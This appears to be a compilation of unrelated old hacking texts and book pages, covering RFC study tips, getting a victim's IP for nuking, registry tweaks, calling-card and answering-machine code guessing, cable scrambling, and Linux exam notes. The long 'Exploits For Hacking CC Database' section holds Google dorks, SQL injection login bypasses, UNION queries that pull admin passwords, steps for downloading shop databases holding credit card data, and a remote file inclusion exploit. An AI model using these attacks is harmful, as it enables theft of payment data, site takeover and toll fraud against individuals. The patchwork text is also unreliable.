Next, consider one of the most common questions I get: "How do I break into a computer????? :( :(" Ask this of someone who isn't a super nice elderly lady like me and you will get a truly rude reaction. Here's why. The world is full of many kinds of computers running many kinds of software on many kinds of networks. How you break into a computer depends on all these things. So you need to thoroughly study a computer system before you can even think about planning a strategy to break into it. That's one reason breaking into computers is widely regarded as the pinnacle of hacking. So if you don't realize even this much, you need to do lots and lots of homework before you can even dream of breaking into computers. But, OK, I'll stop hiding the secrets of universal computer breaking and entry. Check out:

Bugtraq archives: <http://www.securityfocus.com/>
NT Bugtraq archives: <http://www.ntbugtraq.com/>

***************************************************
You can go to jail warning: If you want to take up the sport of breaking into computers, you should either do it with your own computer, or else get the permission of the owner if you want to break into someone else's computer. Otherwise you are violating the law. In the US, if you break into a computer that is across a state line from where you launch your attack, you are committing a Federal felony. If you cross national boundaries to hack, remember that most nations have treaties that allow them to extradite criminals from each other's countries.
***************************************************

Wait just a minute, if you surf over to those sites you won't instantly become an Ubercracker. Unless you already are an excellent programmer and knowledgeable in Unix or Windows NT, you will discover the information at these two sites will *NOT* instantly grant you access to any victim computer you may choose. It's not that easy. You are going to have to learn how to program. Learn at least one operating system inside and out. Of course some people take the shortcut into hacking. They get their phriends to give them a bunch of canned break-in programs. Then they try them on one computer after another until they stumble into root and accidentally delete system files. Then they get busted and run to the Electronic Freedom Foundation and whine about how the Feds are persecuting them.

So are you serious? Do you *really* want to be a hacker badly enough to learn an operating system inside and out? Do you *really* want to populate your dreaming hours with arcane communications protocol topics? The old-fashioned, and super expensive, way is to buy and study lots of manuals.

<Geek mode on> Look, I'm a real believer in manuals. I spend about $200 per month on them. I read them in the bathroom, while sitting in traffic jams, and while waiting for doctor's appointments. But if I'm at my desk, I prefer to read manuals and other technical documents from the Web. Besides, the Web stuff is free! <Geek mode off>

The most fantastic Web resource for the aspiring geek, er, hacker, is the RFCs. RFC stands for "Request for Comment." Now this sounds like nothing more than a discussion group. But actually RFCs are the definitive documents that tell you how the Internet works. The funny name "RFC" comes from ancient history when lots of people were discussing how the heck to make that ARPAnet thingy work. But nowadays RFC means "Gospel Truth about How the Internet Works" instead of "Hey Guys, Let's Talk this Stuff Over."

********************************************************
Newbie note: ARPAnet was the US Advanced Research Projects Agency experiment launched in 1969 that evolved into the Internet. When you read RFCs you will often find references to ARPAnet and ARPA -- or sometimes DARPA. That "D" stands for "defense." DARPA/ARPA keeps on getting its name changed between these two. For example, when Bill Clinton became US President in 1993, he changed DARPA back to ARPA because "defense" is a Bad Thing. Then in 1996 the US Congress passed a law changing it back to DARPA because "defense" is a Good Thing.
********************************************************

Now ideally you should simply read and memorize all the RFCs. But there are zillions of RFCs and some of us need to take time out to eat and sleep. So those of us without photographic memories and gobs of free time need to be selective about what we read. So how do we find an RFC that will answer whatever is our latest dumb question?

One good starting place is a complete list of all RFCs and their titles at ftp://ftp.tstt.net.tt/pub/inet/rfc/rfc-index. Although this is an ftp (file transfer protocol) site, you can access it with your Web browser. (Sorry, that above location is now gone. Nowadays you can find an organized set of RFCs hyperlinked together at Connected: An Internet Encyclopedia, <http://www.FreeSoft.org/Connected/>. I can't even begin to explain to you how wonderful this site is. You just have to try it yourself. Other sets of searchable RFCs are at:

<http://www.rfc-editor.org/rfc.html>
<http://www.faqs.org/rfcs/>
<http://www.pasteur.fr/infosci/RFC/>
<http://www.normos.org/>
<http://www.csl.sony.co.jp/rfc/>)

Or, how about the RFC on RFCs! That's right, RFC 825 is "intended to clarify the status of RFCs and to provide some guidance for the authors of RFCs in the future. It is in a sense a specification for RFCs." To find this RFC, or in fact any RFC for which you have its number, just go to Altavista and search for "RFC 825" or whatever the number is. Be sure to put it in quotes just like this example in order to get the best results.

Whoa, these RFCs can be pretty hard to understand! Heck, how do we even know which RFC to read to get an answer to our questions? Guess what, there is a solution, a fascinating group of RFCs called "FYIs". Rather than specifying anything, FYIs simply help explain the other RFCs. How do you get FYIs? Easy! I just surfed over to the RFC on FYIs (1150) and learned that:

FYIs can be obtained via FTP from NIC.DDN.MIL, with the pathname FYI:mm.TXT, or RFC:RFCnnnn.TXT (where "mm" refers to the number of the FYI and "nnnn" refers to the number of the RFC). Login with FTP, username ANONYMOUS and password GUEST. The NIC also provides an automatic mail service for those sites which cannot use FTP. Address the request to SERVICE@NIC.DDN.MIL and in the subject field of the message indicate the FYI or RFC number, as in "Subject: FYI mm" or "Subject: RFC nnnn".

But even better than this is an organized set of RFCs hyperlinked together on the Web at http://www.FreeSoft.org/Connected/. I can't even begin to explain to you how wonderful this site is. You just have to try it yourself. Admittedly it doesn't contain all the RFCs. But it has a tutorial and a newbie-friendly set of links through the most important RFCs.

Last but not least, you can check out two sites that offer a wealth of technical information on computer security:

http://csrc.nist.gov/secpubs/rainbow/
http://GANDALF.ISU.EDU/security/security.html security library

I hope this is enough information to keep you busy studying for the next five or ten years. But please keep this in mind. Sometimes it's not easy to figure something out just by reading huge amounts of technical information. Sometimes it can save you a lot of grief just to ask a question. Even a dumb question.

Hey, how would you like to check out the Web site for those of us who make our living asking people dumb questions? Surf over to http://www.scip.org. That's the home page of the Society of Competitive Information Professionals, the home organization for folks like me.

So, go ahead, make someone's day. Have phun asking those dumb questions. Just remember to fireproof your phone and computer first!

HOW TO OBTAIN AN IP ADDRESS
*****************************************
WRITTEN BY: NY_2
(af326@seorf.ohiou.edu)
(ny_2_@hotmail.com)
*****************************************

All these newbies ask how to obtain an IP address. I see it all the time. In Yahoo chat rooms (there is usually some lamer named X_hackerMaStEr_X asking how to get an IP for his winuke, but I'm not here to put down lamers), I see it in alt.2600 all the time... of course this newsgroup has enough problems. Enough of this, let's get on the subject.....

First of all, you must decide whether you want to start here and go on to better things, or just want to get an IP and winuke for the rest of your life (we will kinda stick with this, 'cause this txt isn't for "elite" - I use that term loosely).

If you want to go on to better things, I suggest that you read up on the workings of TCP/IP, the stacks, etc. But for now we will concentrate on the ppl who want to use their winuke, land, teardrop, boink, etc.

An IP will consist of anywhere from 8 to 12 numbers, e.g. 207.146.51.3 (don't put this in, I made it up). Usually the first 3 sets of numbers are his ISP's subnet mask and the last set of numbers separates him from the rest of the ppl on his/her ISP. (ISP = Internet service provider)

The first method you can try is to get the bastard to send you an email. If you are using Winblows 95, and I assume most of you are (boy, I love those GUIs.......lol), look at the message header, or if it's through your email client (Outlook Express, Eudora, etc.) click on the email and then Options, and then Properties, and it should be there. (This was for a 4th gen browser, IE 4.0. I assume that you can find it yourself on others.)

If the victim has logged off since then, then this won't work, naturally. The second method I have seen work is to get in those shitty chat rooms, and they usually have a user info tab, and that will usually tell you the IP address (ex. of shitty chat rooms: French Kiss. If you have trouble finding one you can go to my site I created years ago: http://www.seorf.ohiou.edu/~af326/chat.html)

And to defend yourself, I suggest that you obtain patches for port 139 (the port that your nuke sends OOB data to, to crash the victim's comp) (*OOB = out of band data*), or you can get something like Scream's port watcher, or anti-nuke. I have it if you want it; drop me a line.

These settings allow you to boost the speed of your broadband Internet connection when using a Cable Modem or DSL Router with Windows 2000 and Windows XP.

Open your registry and find the key below.

Create the following DWORD values, as most of these values will not already exist you will need to create them by clicking on 'Edit -> New -> DWORD Value' and then set the value as shown below.

DefaultTTL = "80" hex (or 128 decimal) Specifies the default time to live (TTL) for TCP/IP packets. The default is 32.

EnablePMTUBHDetect = "0" Specifies whether the stack will attempt to detect Maximum Transmission Unit (MTU) routers that do not send back ICMP fragmentation-needed messages. The default is 0.

EnablePMTUDiscovery = "1" Specifies whether the TCP/IP stack will attempt to perform path MTU discovery as specified in RFC 1191. The default is 1.

GlobalMaxTcpWindowSize = "7FFF" hex (or 32767 decimal) Specifies the system maximum receive window size advertised by the TCP/IP stack.

TcpMaxDupAcks = "2" Determines the number of duplicate ACKs that must be received for the same sequence number of sent data before "fast retransmit" is triggered.

SackOpts = "1" Enables support for selective acknowledgements as documented by Request for Comment (RFC) 2018. Default is 0.

Tcp1323Opts = "1" Controls RFC 1323 time stamps and window scaling options. Possible values are: "0" = disable RFC 1323 options, "1" = window scale enabled only, "2" = time stamps enabled only and "3" = both options enabled.

TcpWindowSize = "7FFF" hex (or 32767 decimal) Specifies the receive window size advertised by the TCP/IP stack. If you have a latent network you can try increasing the value to 93440, 186880, or 372300.

Exit your registry and restart Windows for the changes to take effect.
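Rather than typing each DWORD into the editor by hand, the settings listed above can be checked and packaged as a .reg file first, so that a mistyped value is caught before it lands in the registry. The following Python script is an added example and not code from the book: it parses setting lines in the exact form the text uses (name, quoted value, optional "hex (or N decimal)"), verifies that the hex and decimal forms agree, rejects anything that does not fit a 32-bit DWORD, and renders a Windows Registration Entries file. The text says "find the key below" but never prints the key; the path used here, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, is the standard TCP/IP parameters key on Windows 2000/XP and is an assumption of this example. The sample input is constructed from the settings in the text.

```python
"""Validate the Tcpip parameter tweaks listed above and emit a .reg file.

Added example (not the book's code). It parses lines written the way the
text writes them, e.g.

    DefaultTTL = "80" hex (or 128 decimal)

checks the hex/decimal pair for consistency, and renders a Registration
Entries file that regedit can import.
"""
import re

# ASSUMPTION: the text omits the key; this is the standard TCP/IP
# parameters key on Windows 2000/XP.
TCPIP_PARAMS_KEY = (
    r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters"
)

# Constructed sample input: the settings listed in the text, one per line.
SETTINGS_TEXT = """\
DefaultTTL = "80" hex (or 128 decimal)
EnablePMTUBHDetect = "0"
EnablePMTUDiscovery = "1"
GlobalMaxTcpWindowSize = "7FFF" hex (or 32767 decimal)
TcpMaxDupAcks = "2"
SackOpts = "1"
Tcp1323Opts = "1"
TcpWindowSize = "7FFF" hex (or 32767 decimal)
"""

# name = "value" [hex [(or N decimal)]]
_LINE = re.compile(
    r'^\s*(?P<name>[A-Za-z0-9]+)\s*=\s*"(?P<val>[0-9A-Fa-f]+)"'
    r'(?:\s+(?P<hex>hex)(?:\s*\(or\s+(?P<dec>\d+)\s+decimal\))?)?\s*$'
)


def parse_setting(line):
    """Return (name, value) for one setting line, or raise ValueError.

    A bare quoted number is decimal; the word 'hex' marks a hex value.
    When an '(or N decimal)' clause is present it must agree with the hex.
    """
    m = _LINE.match(line)
    if not m:
        raise ValueError("unrecognised setting line: %r" % line)
    name, raw = m.group("name"), m.group("val")
    if m.group("hex"):
        value = int(raw, 16)
        dec = m.group("dec")
        if dec is not None and int(dec) != value:
            raise ValueError("%s: hex %s != decimal %s" % (name, raw, dec))
    else:
        if not raw.isdigit():
            raise ValueError("%s: %r is not decimal (missing 'hex'?)" % (name, raw))
        value = int(raw, 10)
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("%s: %d does not fit a DWORD" % (name, value))
    return name, value


def parse_settings(text):
    """Parse every non-blank line into a name -> value dict (insertion order)."""
    result = {}
    for line in text.splitlines():
        if line.strip():
            name, value = parse_setting(line)
            result[name] = value
    return result


def render_reg(settings, key=TCPIP_PARAMS_KEY):
    """Render a .reg file body; DWORDs are written as 8 hex digits."""
    lines = ["Windows Registry Editor Version 5.00", "", "[%s]" % key]
    for name, value in settings.items():
        lines.append('"%s"=dword:%08x' % (name, value))
    return "\r\n".join(lines) + "\r\n"


if __name__ == "__main__":
    # Write with UTF-16, which is what the "Version 5.00" header expects.
    body = render_reg(parse_settings(SETTINGS_TEXT))
    with open("tcpip_tweaks.reg", "w", encoding="utf-16") as fh:
        fh.write(body)
    print(body)
```

Review the rendered file before importing it: the script only writes what it could parse, so a typo or a hex/decimal mismatch fails loudly with ValueError instead of silently setting a wrong value. Exporting the key from regedit first gives you a .reg file to restore from if the new values turn out worse for your link.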

If you don't want to edit the registry, here's a little TCP utility that is ideal...

http://www.broadbandreports.com/front/doctorping.zip

---------------------------------------
Title| Hacking Calling Cards
---------------------------------------

Phreak codes are fast running out, and people are getting caught. It's time to pioneer a brand new industry. So far I think this file is original, so I am writing it.

Most, if not all, people have calling cards from AT&T. They can be used from any phone to dial long distance and charge it to your AT&T bill. The objective: to use someone else's card to get free long distance service. These codes are not traced, and they are only FOUR digits! The nice part is you can hack the code for anyone you like and attack a specific person, not a random name like when hacking MCI. Take your worst enemy: when you know his phone number, it's the end...

Format:
a. Dial 0.
b. Dial phone number with area code.
c. Wait for tone.
d. Dial billing number with or without area code.

If your code is correct, the fone will ring. If it is not correct a recording will say "Please dial your card number again, the card number you have dialed is invalid". You can try another four digits but after that it will tell you to call AT&T if it is still invalid.
This is more of a pain to hack because there are a thousand possible codes for each phone number. Just make a short basic program to do the job of dialing all the codes. It's best to do a random scan instead of sequential, in my opinion.

If you have something you can add to this file then please tell me...

Hacking AT&T Answering Machines

1. Dial telephone and wait for AT&T Answering Machine to answer.
2. Quickly enter the following string:

1234567898765432135792468642973147
4193366994488552277539596372582838
491817161511026203040506070809001

(btw: this is the shortest string for entering every possible 2-digit combo.)

3. You'll know you hit the code because the messages will start playing.
4. Here's a list of TouchTone(c) Commands:

Listen to messages: 7
Listen to new messages: 6
Stop: #
Rewind Tape: 2
Advance Tape: 5
Clear Messages: 3,3
Record memo: *
Record Announcement: 4,*
Play Announcement: 4,1
Turn System On: 0
Turn System Off: 8,8

***************************************************************************
* CABLE TV SCRAMBLING TECHNIQUES
------------------------------------------------------------------------------

There are 4 major methods of pay-channel security and each has different consequences for cable-ready receivers. The 4 systems are jamming, trapping, out-of-band scrambling and in-band scrambling.

Jamming: A jamming signal is placed between the picture carrier and the aural carrier of the secured channels. The cable operator supplies a filter for each customer for each paid channel. This type of security is easily defeated by homemade notch filters.

Trapping: In these systems frequency filters are installed in line with the cable drops on telephone poles. The traps are removed for customers paying for the premium channels. Cable-ready TVs work fine in these systems.

Scrambling - The Gated Sync Methods: Scrambling in the cable TV business still generally means pulsed sync suppression. In its simplest form, the amplitude of the picture carrier is reduced by 6 dB during the horizontal blanking intervals and sometimes during the vertical blanking intervals. The resulting video signal has sync tips between the black and white levels. Sync separators in the set cannot operate properly with this signal, nor can AGC and color circuits, so the picture is scrambled. The decoder compensates by attenuating the signal during the time in which the transmitted signal was not attenuated. In order to accomplish this, the logic-controlled gain switch must get timing information. In-band systems transmit pulses as amplitude modulation of the aural carrier, or of a separate carrier in out-of-band systems.

Out-of-band scrambling: The usual setup is that the decoder is connected directly to the cable ahead of the channel converter. Decoding is done at the pay channel frequency.

Page 422


The decoder is likely to be in a separate box, added to an old system to provide pay channels. The box consists of a simple receiver (90-120 MHz) for the out-of-band data carrier and a broadband 6 dB gain switch. There is provision for several scrambled channels, each of which has a different data carrier. This system is directly compatible with cable-ready receivers. Without the cable converter, the decoder is connected to the TV. Tuning and remote features of the TV are preserved, with the only inconvenience being the need to operate the switch on the decoder when changing to and from any scrambled channel. Out-of-band systems tend to last until the operators using them rebuild to provide for a large increase in the number of channels.

In-Band Scrambling: In this system any number of the available channels can be scrambled. Because the data carrier for each scrambled channel is its own aural carrier, only one data receiver, at the aural carrier frequency (e.g. ch 3), is required. The decoder detects the presence or absence of data, automatically switching itself in or out. The converter-decoder box can be hardwired to decode just the channels ordered, using a PROM-like device. Alternatively, the transmitted channels can be "tagged" by time-division multiplexing binary tag (program identification) data with the sync data on the aural carrier. The decoder boxes can be wired for "tiers" (groups of programs the cable operator sells together) rather than fixed channels, giving the operator more flexibility. The decoder boxes can be "addressable". These boxes have a separate out-of-band data channel for data from the head end. Each box has a serial number burned into its logic or otherwise available to its logic circuitry, and its channel or tier authorization stored in volatile RAM. A computer at the headend periodically addresses all decoders in the system individually and loads each with the channel or tier capacity ordered by the customer. The need for house calls is reduced, PPV (Pay per view) is possible, and missing boxes can be turned off, rendering them useless for premium channel viewing. Some but not all of these features can be programmed into out-of-band systems.

Aside from their ability to generate sync pulses, thus foiling the scrambling system, cable-ready TVs have presented another difficult problem for in-band systems. Because the decoder operates at the converted channel, a channel converter is required ahead of it. Whether the TV receiver is cable-ready or not, it operates only at the converted channel, wasting the tuning and remote control features.

Exploits For Hacking CC Database 1google dork :--> inurl:"/cart.php?m=" Mail:mtahirzahid@yahoo.com

Page 431


Power Of Hacking速 target looks lile :--> http://xxxxxxx.com/s...cart.php?m=view exploit: chage cart.php?m=view to /admin target whit exploit :--> http://xxxxxx.com/store/admin Usename : 'or"=" Password : 'or"=" 2google dork :--> allinurlroddetail.asp?prod= target looks like :--> http://www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers ) exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb target whit exploit :--> http://www.xxxxxx.org/fpdb/vsproducts.mdb 3google dork :--> allinurl: /cgi-local/shopper.cgi target looks like :--> http://www.xxxxxx.co....dd=action&key= exploit :--> ...&template=order.log target whit exploit :--> http://www.xxxxxxxx.....late=order.log 4google dork :--> allinurl: Lobby.asp target looks like :--> http://www.xxxxx.com/mall/lobby.asp exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb target whit exploit :--> http://www.xxxxx.com/fpdb/shop.mdb 5google dork :--> allinurl:/vpasp/shopsearch.asp when u find a target put this in search box Keyword=&category=5); insert into tbluser (fldusername) values ('')--&SubCategory=&hide=&action.x=46&action.y=6 Keyword=&category=5); update tbluser set fldpassword='' where fldusername=''--&SubCategory=All&action.x=33&action.y=6 Keyword=&category=3); update tbluser set fldaccess='1' where fldusername=''--&SubCategory=All&action.x=33&action.y=6 Jangan lupa untuk mengganti dan nya terserah kamu. Untuk mengganti password admin, masukkan keyword berikut : Keyword=&category=5); update tbluser set fldpassword='' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6 login page: http://xxxxxxx/vpasp/shopadmin.asp 6google dork :--> allinurl:/vpasp/shopdisplayproducts.asp target looks like :--> http://xxxxxxx.com/v....asp?cat=xxxxxx exploit :-Mail:mtahirzahid@yahoo.com

http://xxxxxxx.com/vpasp/shopdisplay...20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'
If this is not working, try these endings: %20'a%25' - %20'b%25' - %20'c%25' - ... After finding user and pass, go to the login page: http://xxxx.com/vpasp/shopadmin.asp

7. google dork: allinurl:/shopadmin.asp
target looks like: http://www.xxxxxx.com/shopadmin.asp
exploit: user: 'or'1 pass: 'or'1

8. google dork: allinurl:/store/index.cgi/page=
target looks like: http://www.xxxxxx.co....short_blue.htm
exploit: ../admin/files/order.log
target with exploit: http://www.xxxxxxx.c....iles/order.log

9. google dork: allinurl:/metacart/
target looks like: http://www.xxxxxx.com/metacart/about.asp
exploit: /database/metacart.mdb
target with exploit: http://www.xxxxxx.com/metacart/database/metacart.mdb

10. google dork: allinurl:/DCShop/
target looks like: http://www.xxxxxx.com/xxxx/DCShop/xxxx
exploit: /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target with exploit: http://www.xxxx.com/xxxx/DCShop/orders/orders.txt or http://www.xxxx.com/xxxx/DCShop/Orders/orders.txt

11. google dork: allinurl:/shop/category.asp/catid=
target looks like: http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit: /admin/dbsetup.asp
target with exploit: http://www.xxxxxx.com/admin/dbsetup.asp
After getting that page, look for dbname and path. (Other good files are sdatapdshoppro.mdb and access.mdb.)
target for downloading the database: http://www.xxxxxx.com/data/pdshoppro.mdb (doesn't

need to be like this). In the db, look for "access" to find the pass and user of the shop admins.

12. google dork: allinurl:/commercesql/
target looks like: http://www.xxxxx.com/commercesql/xxxxx
exploit: cgi-bin/commercesql/index.cgi?page=
target with exploit, admin config: http://www.xxxxxx.co..../admin_conf.pl
target with exploit, admin manager: http://www.xxxxxx.co....in/manager.cgi
target with exploit, order.log: http://www.xxxxx.com....iles/order.log

13. google dork: allinurl:/eshop/
target looks like: http://www.xxxxx.com/xxxxx/eshop
exploit: /cg-bin/eshop/database/order.mdb
target with exploit: http://www.xxxxxx.co....base/order.mdb
After downloading the db, look at "access" for user and password.

14.
1/ search google: allinurl:"shopdisplayproducts.asp?id=
---> http://victim.com/shopdisplayproducts.asp?id=5
2/ find the error by adding '
---> http://victim.com/shopdisplayproducts.asp?id=5'
---> error: Microsoft JET database engine error "80040e14" ..... /shop$db.asp, line 467
If you don't see an error, change id to cat:
---> http://victim.com/shopdisplayproducts.asp?cat=5'
3/ if this shop has the error, add this: %20union%20select%201%20from%20tbluser"having%201=1--sp_password
---> http://victim.com/shopdisplayproduct...on%20select%201%20from%20tbluser"having%201=1--sp_password
---> error: 5' union select 1 from tbluser "having 1=1--sp_password .... The number of columns in the two selected tables or queries of a union query do not match ......
4/ add 2,3,4,5,6 ....... until you see a nice table
add 2
----> http://victim.com/shopdisplayproduct...on%20select%201,2%20from%20tbluser"having%201=1--sp_password
then 3
----> http://victim.com/shopdisplayproduct...on%20select%20

1,2,3%20from%20tbluser"having%201=1--sp_password
then 4
----> http://victim.com/shopdisplayproduct...on%20select%201,2,3,4%20from%20tbluser"having%201=1--sp_password
... 5,6,7,8,9 .... until you see a table. (example: ... 47)
----> http://victim.com/shopdisplayproduct...on%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_password
----> see a table.

5/ When you see a table, change 4 to fldusername and 22 to fldpassword and you will have the admin username and password
---> http://victim.com/shopdisplayproduct...on%20select%201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser%22having%201=1--sp_password

6/ Find the admin link to log in. Try this first: http://victim.com/shopadmin.asp or: http://victim.com/shopadmin.asp

Didn't work? Then you have to find it yourself. Add (for the above example):
'%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
---> http://victim.com/shopdisplayproduct...n%20select%201,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password

You'll see something like (a lot of them): shopaddmoretocart.asp shopcheckout.asp shopdisplaycategories.asp .............. Then guess the admin link by adding the above data until you find the admin links.

15.

Type: VP-ASP Shopping Cart
Version: 5.00
Dork: intitle:VP-ASP Shopping Cart 5.00
You will find many websites with the VP-ASP 5.00 cart software installed. Now let's get to the exploit. The page will be like this:
****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is diag_dbtest.asp, so do this:
****://***.victim.com/shop/diag_dbtest.asp
A page will appear with something like:
xDatabase shopping140 xDblocation resx xdatabasetype xEmail xEmailName xEmailSubject xEmailSystem xEmailType xOrdernumber
.:. EXAMPLE .:.
The most important thing here is xDatabase. xDatabase: shopping140. OK, now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
If you didn't download the database, try this while there is a dblocation (xDblocation resx); the URL will be:
****://***.victim.com/shop/resx/shopping140.mdb
If you see the error message, you have to try this:
****://***.victim.com/shop/shopping500.mdb
Download the mdb file and you should be able to open it with any mdb file viewer (you should be able to find one at download.com). Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website. The admin login page is usually located here:
****://***.victim.com/shop/shopadmin.asp
If you cannot find the admin username and password in the mdb file, or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords, which are:

Username: admin, password: admin
OR
Username: vpasp, password: vpasp

16. Sphider Version 1.2.x (include_dir) remote file inclusion
# Sphider Version 1.2.x (include_dir) remote file inclusion
# script Vendor: http://cs.ioc.ee/~ando/sphider/
# Discovered by: IbnuSina
Found in index.php:
$include_dir = "./include"; <--- no patch here
$language_dir = "./languages";
include "$include_dir/index_header.inc";
include "$include_dir/conf.php";
include "$include_dir/connect.php";
exploit: http://targe.lu/[sphiderpath]/index.php?include_dir=injekan.lu

Finding A Spoofed Website With Javascript

Lots of people think that Javascript is an inferior language, but Javascript is an extremely powerful language, and those who think otherwise either don't know how to use it or are not familiar with its capabilities. With Javascript you can do lots of cool things such as edit any page or make an image fly, but it is a waste of time to spend your time making images fly or editing pages with Javascript. Anyway, coming to the main topic: did you know that Javascript can be used to detect whether a page is a spoofed or phishing website or a legitimate one? If you don't, just paste the following code into the address bar and a pop-up will appear telling you whether

the website is original or not. Here is the Javascript code:

javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");

Free Website & Forum Making Sites

(Website free making sites)
1) www.ucoz.com
2) www.webs.com
3) www.weebly.com
4) www.wetpaint.com
5) www..com
6) www.freewebsites.com
7) www.jimdo.com
8) www.freewebspace.com
9) www.110mb.com
10) www.sitesled.com
11) www.webnode.com

(Forum making free sites)
1) www.forumotion.com
2) www.freeforum.com
3) www.lefora.com
4) www.makeforum.org
5) www.forumer.com
6) www.freeforum.ca
7) www.nabble.com

PRACTICE Question:-

Linux Operating System

While it is not necessary to be a Linux administrator or developer to pass this test, there is some assumed knowledge of a few basics, particularly pertaining to security issues.

Linux File System
/      Root of the file system
/var   Variable data; log files are found here
/bin   Binaries, commands for users
/sbin  System binaries, commands for administration
/root  Home directory for the root user
/home  Directory for all home folders for non-privileged users
/boot  Stores the Linux kernel image and other boot files
/proc  Direct access to the Linux kernel
/dev   Direct access to hardware storage devices
/mnt   Place to mount devices onto the user-mode file system

Identifying Users and Processes
INIT process ID: 1
Root UID, GID: 0
Accounts for services: 1-999
All other users: above 1000

MAC Times
Modify: modify the contents of the file
Access: when the file was accessed last
Change: metadata change
Use the "touch -mac filename" command to update all of them at the same time.

Permissions
        User   Group   Others
R       400    040     004
W       200    020     002
X       100    010     001
SUID    4000
SGID    2000

Examples
User can RWX, Group can RW and Others can R: 764
User can RW, Group can R and Others can R: 644
SUID bit set, User and Group can RWX: 4770
SUID and SGID bits set, all users can RWX: 6777
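The octal values in the table above simply add together, and a defender reads them back from `ls -l` in the opposite direction. The following Python is an added example (not the book's own code) that builds a mode from the per-class rwx letters, renders it the way chmod and `ls -l` show it, flags the SUID/SGID-on-executable cases an auditor lists first, and reads the three MAC times back from an inode. It goes one step beyond the table by also handling the sticky bit (1000), which follows the same scheme.

```python
"""Unix mode bits as in the permissions table above.  Added example; not from the book."""
import os

# Per-class values from the table: r=4, w=2, x=1.  Special bits: SUID=4000, SGID=2000.
# The sticky bit (1000) is not in the table but completes the same octal scheme.
PERM_BITS = {"r": 4, "w": 2, "x": 1}
SUID, SGID, STICKY = 0o4000, 0o2000, 0o1000


def mode_from_symbolic(user, group, other, suid=False, sgid=False, sticky=False):
    """Build a numeric mode from class strings such as "rwx", "rw", "r" or ""."""
    def class_value(spec):
        return sum(PERM_BITS[ch] for ch in spec if ch in PERM_BITS)

    mode = (class_value(user) << 6) | (class_value(group) << 3) | class_value(other)
    if suid:
        mode |= SUID
    if sgid:
        mode |= SGID
    if sticky:
        mode |= STICKY
    return mode


def octal_string(mode):
    """Render a mode the way chmod and the table write it, e.g. 0o4770 -> "4770"."""
    return format(mode, "o")


def describe_mode(mode):
    """Render a mode the way `ls -l` shows it: an 's' marks SUID/SGID on an executable,
    a capital 'S' marks the special bit set without execute (usually a mistake)."""
    out = []
    for shift, special, letter in ((6, SUID, "s"), (3, SGID, "s"), (0, STICKY, "t")):
        bits = (mode >> shift) & 0o7
        out.append("r" if bits & 4 else "-")
        out.append("w" if bits & 2 else "-")
        has_x = bool(bits & 1)
        if mode & special:
            out.append(letter if has_x else letter.upper())
        else:
            out.append("x" if has_x else "-")
    return "".join(out)


def is_privileged_executable(mode):
    """True when SUID or SGID is set on something executable: the files an auditor lists first."""
    return bool(mode & (SUID | SGID)) and bool(mode & 0o111)


def mac_times(path):
    """The three MAC timestamps from the inode: Modify (content), Access (last read),
    Change (metadata such as mode or owner).  Forensic timelines are built from these."""
    st = os.stat(path)
    return {"modify": st.st_mtime, "access": st.st_atime, "change": st.st_ctime}


if __name__ == "__main__":
    for spec in (("rwx", "rw", "r"), ("rw", "r", "r")):
        print(spec, octal_string(mode_from_symbolic(*spec)))
    print(describe_mode(0o4770), describe_mode(0o6777))
    print(mac_times("."))
```

Running it reproduces the four example modes from the table (764, 644, 4770, 6777); `describe_mode(0o4644)` gives `rwSr--r--`, the capital S being the sign of a SUID bit on a file nobody can execute.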

Linux Commands

Practice the following commands and be able to recognize them in a shell script or log file. Always remember to "manpage" a command. Get used to reading about options and usage.

Command (notable options) - Description

Using Linux (Basic Commands)
man (/) - Manual pages
ls (-l) - Look into a directory
cd - Change directory
pwd - Print working directory
touch (-macr) - Create a file or update its attributes
mv - Move a file
rm - Remove a file
mkdir - Make a directory
grep - String search utility
more - Paginate the output to the console
nano - Simple text editor
vi - Powerful text editor
gcc (-o) - Compile from source code

Administration and Troubleshooting
dd - Create an image file of a volume or device
file - Query a file for its type
netstat - List state of TCP/UDP ports
dig - DNS zone transfer
host - Look up DNS records
lsof - List open files
ps (aux) - View process list
rpcinfo - Enumerate portmapper
smbclient (-L) - List or use SMB shares
md5sum - Calculate MD5 hash

Security tools that run best under Linux (add your own to this list!)
mailsnarf, urlsnarf, filesnarf
ettercap (-q -z) - MiTM sniffer
nmap - Network mapper
hping (-c count -S) - Packet crafter
snort - Network intrusion detection
iptables (-P -A -j --sport --dport -p) - Kernel mode firewall

kismet - WiFi scanner and sniffer
nikto - Web vulnerability scanner
maltego - Information gathering
tcpdump (-i) - Command line sniffer
firewalk (-u) - Firewall enumerator
nc (-l -e -v) - "Swiss army knife"

Command Line Tools

